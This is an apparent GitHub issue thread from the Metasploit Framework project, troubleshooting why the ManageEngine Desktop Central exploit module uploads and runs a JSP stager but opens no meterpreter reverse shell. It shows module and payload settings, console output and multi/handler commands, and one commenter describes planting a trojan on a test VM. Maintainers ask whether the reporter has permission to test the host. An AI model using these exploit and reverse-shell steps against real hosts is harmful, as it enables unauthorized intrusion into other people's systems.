rapid7 / metasploit-framework

Metasploit Framework
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Exploit completed, but no session was created. #9843

Closed korsangazi closed 6 years ago

korsangazi commented 6 years ago

Steps to reproduce

Issue picture: https://prnt.sc/j2jar4

Module options (exploit/windows/http/manageengine_connectionid_write):

Name Current Setting Required Description

Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST xx.xx.x.x yes The target address RPORT 8020 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path for ManageEngine Desktop Central VHOST no HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name

0 ManageEngine Desktop Central 9 on Windows

msf5 exploit(windows/http/manageengine_connectionid_write) > exploit

[] Started reverse TCP handler on [] Creating JSP stager [] Uploading JSP stager gHZKe.jsp... [] Executing stager... [!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/gHZKe.jsp' on the target [*] Exploit completed, but no session was created.

Metasploit version

Framework: 5.0.0-dev-a473dd0 Console : 5.0.0-dev-a473dd0



wvu commented 6 years ago

Are you sure it's vulnerable?

korsangazi commented 6 years ago

i think so yes, I dont know how to use payload.

bcoles commented 6 years ago

Do you have permission to test on the host?

Have you tried the check method?

Is the remote host running Windows?

Does the remote host allow egress traffic to port 4444/tcp?

korsangazi commented 6 years ago

I cant access Remote host, The remote host using windows. I changed the port, still doesnt working

sempervictus commented 6 years ago

If you have permission, you should ensure connectivity on the reverse path (routing and socket access to the lhost lport from the target). If you don't, stop doing what you're doing.

korsangazi commented 6 years ago

@sempervictus I tested with generic payload handler. it is working but i cannot run exploit.

shellhunter commented 6 years ago

Are you testing a system on the internet or on an internal LAN? You're currently binding your handler to an internal (10.x.x.x) IP. Just to make sure that this is not the problem.

korsangazi commented 6 years ago

msf5 exploit(multi/handler) > exploit

[] Started reverse TCP handler on [] 198.199.x.xxx - Command shell session 2 closed. Reason: Died from EOFError [] Command shell session 2 opened ( -> 198.199.x.x:51935) at 2018-04-08 19:11:19 +0000 [] 198.199.x.xxx - Command shell session 3 closed. Reason: Died from EOFError [*] Command shell session 3 opened ( -> 198.199.x.x:51938) at 2018-04-08 19:11:21 +0000

@kevin-ott yes. my output

sempervictus commented 6 years ago

If the session is starting, you've got socket and routing. Is the digital ocean drop @ yours? If so, I'd try to generate the payload manually and run it from the drop, to see that the handler and payload can keep comms. What I see as interesting is that the lhost on your session is localhost, should be that 10.x address.

ManikandaprabhuS commented 5 years ago

Exploit completed, but no session was created.??

dessy53 commented 1 year ago


pls i have been trying to get it right but its not working, any idea on what to do?

bcoles commented 1 year ago

pls i have been trying to get it right but its not working, any idea on what to do?

There is not enough information to offer any assistance. You can set HttpTrace true to see debug output which may help. This issue is closed.

bingo1199 commented 1 year ago

i am trying to hack my virtual window in the same network

for the trojan lhost= lport=2525

msfconsole =use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp set lhost= lport=2525 set target=0

after downloading the trojan in virtual window exploit , exploit -j -z , run

exploit completed but no session was created.. what can i do